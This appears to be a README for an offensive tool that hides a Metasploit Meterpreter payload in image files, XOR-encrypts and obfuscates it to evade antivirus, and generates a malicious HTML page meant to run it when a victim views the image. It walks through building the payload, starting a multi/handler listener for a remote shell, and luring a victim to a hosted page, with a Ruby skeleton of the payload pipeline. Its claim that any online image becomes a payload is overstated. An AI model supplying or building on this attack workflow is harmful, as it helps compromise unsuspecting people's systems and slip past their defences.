This No-Click Payload for Metasploit embeds a payload (e.g., Meterpreter shell) into a .jpeg, .jpg, .webp, .png, or .gif image and generates a malicious HTML file. When the image is viewed in a web browser, the HTML file is automatically loaded, triggering the execution of the embedded payload and potentially compromising the system.
The Breakdown:
- No User Interaction: The payload is executed without any action required from the victim, except for viewing the image in a browser.
- HTML File as Trigger: The HTML file acts as the trigger mechanism for the payload. It's automatically loaded when the image is viewed, making the attack seamless.
- Potential Impact: Every image online is now a potential "payload".
Take note that all my code was created with the help of LLM's or "AI". All of my code is a suggestion. Anything can be modified or made to execute better. Skill and imagination are all that limits us.
- Inspiration for this project was obtained by how Canary Tokens operate.
- Steganography: Hides the payload within an image file.
- Encryption: Encrypts the payload using XOR encryption with a random key.
- Polymorphism: Applies techniques to obfuscate the payload and evade antivirus detection.
- Malicious HTML Generation: Creates an HTML file that extracts and executes the embedded payload.
- Metasploit Integration: Designed to work seamlessly with the Metasploit framework for handler setup and post-exploitation.
- Ruby programming language (version 2.7 or higher)
- Metasploit framework: Follow the installation instructions for your operating system from the Official Metasploit website.
Clone the repository:
git clone
Navigate to the project directory:
cd embedded-image-payload
Install dependencies:
bundle install
There are many ways to obfuscate an html webpage (even a malicious page) that passes all saftey and https requirements.
- Customize (Optional):
* Modify module.rb to adjust settings like image path and output path.
* Customize payload generation or obfuscation techniques in payload.rb if needed. - Generate Payload and HTML:
* Execute your Metasploit module (replace <your_module_filename.rb> with the actual filename):
ruby <your_module_filename.rb>
- Set Up Metasploit Handler:
* Open a new terminal and start msfconsole.
* Use the exploit/multi/handler module.
* Configure the handler to match the payload used in your module.
* Set LHOST (your IP) and LPORT.
* Start the handler with run. - Deliver and Execute:
* Make a website hosting your html file.
* Get victim to view image on website.
# In your Metasploit module file (e.g., module.rb)
# ... your module code ...
def exploit
# ... your exploit logic ...
# Example payload configuration (adjust as needed)
payload_data = generate_payload_exe
key = generate_random_key(16)
encrypted_payload = xor_encrypt(payload_data, key)
polymorphic_payload = generate_polymorphic_payload(encrypted_payload)
final_payload = heuristic_technique(polymorphic_payload)
# ... rest of your exploit logic ...